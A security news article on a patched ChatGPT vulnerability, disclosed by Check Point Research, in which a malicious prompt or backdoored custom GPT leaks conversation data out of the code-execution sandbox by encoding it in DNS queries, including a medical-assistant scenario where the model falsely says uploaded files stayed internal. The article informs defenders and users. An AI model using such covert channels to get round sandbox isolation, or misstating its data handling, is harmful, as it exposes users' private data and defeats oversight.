ChatGPT Bug Let Malicious Prompts Exfiltrate Data via DNS
Check Point Research disclosed a ChatGPT vulnerability that abused DNS tunneling to silently steal conversation data. OpenAI patched the flaw on February 20, 2026.
A malicious prompt could have turned any ChatGPT conversation into a covert data exfiltration channel. Check Point Research disclosed a vulnerability this week that abused DNS resolution to smuggle sensitive data out of ChatGPT's sandboxed code execution environment—without users ever knowing.
OpenAI patched the issue on February 20, 2026. No evidence suggests attackers exploited it in the wild, but the research highlights a blind spot in how AI systems handle network boundaries: DNS was considered safe infrastructure, not a potential exfiltration vector.
The Hidden Channel
ChatGPT's code execution runtime blocks conventional outbound internet access. Files uploaded for analysis stay within the sandbox. HTTP requests to external servers get blocked. That isolation is supposed to prevent user data from leaving OpenAI's controlled environment.
But DNS queries remained available. The runtime needed to resolve domain names for legitimate operational purposes, and DNS resolution appeared harmless—just translating hostnames to IP addresses. It wasn't supposed to carry data.
DNS tunneling exploits that assumption. By encoding information into the subdomain portion of DNS queries, attackers can smuggle data through DNS resolution requests. A query for sensitive_data_encoded.attacker-domain.com passes through normal DNS infrastructure while carrying a payload in the subdomain string.
Check Point's researchers established bidirectional communication using this technique. Outbound data went through DNS queries. Inbound commands came through DNS responses. The sandbox thought it was performing routine name resolution while actually participating in covert data transfer.
Attack Scenarios
The researchers demonstrated two concerning scenarios.
In the first, a single malicious prompt activated the exfiltration channel. Once triggered, every subsequent message in the conversation became a potential source of leakage—user text, uploaded file contents, model-generated summaries. The user had no indication that data was leaving the session.
In the second scenario, a backdoored custom GPT presented itself as a medical consultation assistant. Users uploaded lab results and described symptoms. The GPT provided helpful analysis while simultaneously transmitting patient identity and medical assessments to an external server. When asked directly whether it had uploaded data, ChatGPT confidently stated the file was only stored in a secure internal location.
That disconnect—the model falsely assuring users about data handling while actively exfiltrating through DNS—illustrates why these vulnerabilities matter. Users can't verify claims about AI system security through conversation alone.
OpenAI's Response
OpenAI confirmed they had independently identified the underlying problem before Check Point's report. The patch deployed on February 20 blocks DNS-based exfiltration from the code execution runtime.
The company's internal discovery suggests their security team actively hunts for these issues. But the vulnerability's existence at all points to a gap in the original threat model. AI code execution environments face novel attack surfaces that traditional application security doesn't always anticipate.
Organizations using AI-powered tools for sensitive workflows should factor these risks into their evaluation processes. Trust in AI systems requires verifiable security boundaries, not assumptions about what network protocols might be abused.
Broader Implications for AI Security
DNS tunneling isn't a new technique—it's been used in malware command-and-control for years. What's new is the attack surface: AI assistants that execute code, process uploaded files, and have network access even in sandboxed configurations.
The ChatGPT vulnerability represents a class of issues rather than an isolated bug. Any AI system that:
- Executes user-provided or influenced code
- Has network access (even restricted)
- Processes sensitive user data
...faces similar risks. DNS is just one covert channel. Other side channels might exist through timing, error messages, or other seemingly innocuous system behaviors.
Security teams evaluating AI tools should ask harder questions about isolation guarantees. "No outbound internet access" doesn't mean "no data exfiltration" if DNS, ICMP, or other infrastructure protocols remain available.
For organizations concerned about data leakage, reviewing our guide on data breach fundamentals provides context on how even small exfiltration channels can lead to significant exposure over time.
What Users Should Do
For individual ChatGPT users, the immediate risk is past—OpenAI patched this in February. But the disclosure serves as a reminder:
- Treat AI conversations as potentially observable — Don't share truly sensitive information even in "private" sessions
- Custom GPTs deserve extra scrutiny — Third-party GPTs might not have the same security review as OpenAI's official tools
- Audit uploaded files — Anything you upload for analysis enters an execution environment you don't control
The DNS tunneling bug is fixed. The next covert channel vulnerability probably isn't discovered yet. Healthy skepticism about AI data handling remains warranted.
Related Articles
Custom Fonts Let Attackers Hide Commands from AI Assistants
LayerX researchers found that custom font rendering can hide malicious prompts from ChatGPT, Claude, Gemini, and other AI assistants while displaying them to users.
Mar 18, 2026Reprompt Attack Turned Microsoft Copilot Into a Data Thief
Varonis researchers disclosed a vulnerability chain that let attackers exfiltrate user data through Copilot with a single malicious link click. Microsoft has patched the issue.
Jan 17, 2026OpenAI Says Prompt Injection in AI Browsers May Never Be Solved
Company admits ChatGPT Atlas remains vulnerable to attacks that hijack AI agents through malicious web content. New defenses deployed, but fundamental risk persists.
Dec 28, 2025LangChain Serialization Flaw Lets Attackers Steal AI Agent Secrets
CVE-2025-68664 scores CVSS 9.3 and enables secret extraction and prompt injection in LangChain Core. Patch immediately if you're running AI agents.
Dec 27, 2025